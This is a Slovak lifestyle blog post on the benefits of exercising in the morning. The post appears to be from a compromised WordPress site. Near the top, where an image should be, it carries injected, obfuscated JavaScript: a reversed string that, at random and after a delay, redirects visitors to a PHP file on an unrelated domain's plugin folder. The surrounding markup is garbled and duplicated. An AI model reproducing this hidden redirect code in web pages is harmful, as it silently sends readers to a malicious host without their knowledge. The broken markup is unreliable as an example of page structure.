Prečo ráno cvičiť?

| február 15, 2020

Vo všeobecnosti je cvičenie prospešné, bez ohľadu na to, kedy ho praktizujeme. Vo svete fitness nadšencov však čoraz silnejšie rezonuje otázka, či je efektívnejšie cvičiť ráno alebo vo večerných hodinách. Po odpoveď netreba chodiť ďaleko – väčšina odborníkov sa prikláňa k rannej verzii. Prečo je to tak?

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“‘php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and-black-pants-863974.jpg”>andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and-black-pants-863974.jpg” alt=”” width=”590″ height=”393″ />

 

 

Energia po celý deň

Jedným z hlavných benefitov rannej rozcvičky je najmä jej schopnosť naštartovať vás do nového dňa. Teplo, ktoré počas cvičenia vyprodukujete, sa v tele premieňa na energiu a vy tak máme po celý deň „dobité baterky“. Navyše, podporuje aj vašu produktivitu a schopnosť podať lepší výkon aj v pracovnej sfére. Cviky, ktoré tréneri odporúčajú na ráno, sú najmä kardiového charakteru, pretože svaly dokonale natiahnu a precvičia, a tak budú schopné lepšie znášať bremená nového dňa.

Zdravý spánkový režim

Ďalším dôvodom, prečo je ranný tréning efektívnejší, je fakt, že vďaka nemu bude aj váš spánok zdravší a pokojnejší. Niektorí ľudia môžu mať problémy s ranným vstávaním, no pravidelné cvičenie môže ich celkový spánkový biorytmus značne ovplyvniť. Začne sa totiž postupne prispôsobovať a vytvárať prirodzenú túžbu ísť večer skôr spať a ráno vstávať a ísť cvičiť. Tento proces je pre organizmus veľmi prospešný a prispieva k jeho celkovej vitalite. 

V zdravom tele…zdravé myšlienky

Prečistenie hlavy je takisto jedným z množstva dôvodov, prečo mnohí fitness tréneri preferujú ranný tréning. Tvrdia totiž, že podávanie fyzického výkonu ešte pred tým psychickým, s ktorým sa, či chceme alebo nie, všetci stretávame dennodenne, zároveň slúži ako zdravá očista organizmu od stresu alebo úzkosti. Negatívne myšlienky majú na vaše zdravie väčší vplyv než si myslíte, a dokážu produkovať telu škodlivé látky, ktoré môžu ovplyňovať náladu.

Nie je žiadnym tajomstvom, že cvičenie je často  akýmsi magickým mood boosterom, pretože sa v tele vyplavujú tzv. „hormóny šťastia“, ako napríklad endorfín alebo serotonín. Aj to je jedným z dôvodov, prečo je cvičenie považované za jedno z najprirodzenejších spôsobov, ako udržať fit nielen postavu, ale aj celkovú prirodzenú rovnováhu medzi telom a duchom. 

Za vyskúšanie aspoň na pár týždňov nič nedáte. Pozitívny dopad, ktorý má (nielen ranné) cvičenie, rozhodne stojí za to

 

Foto: pexels.com, harpersbazaar.com

Tags:

Category: HOMEPAGE, ZDRAVIE a FIT

Comments are closed.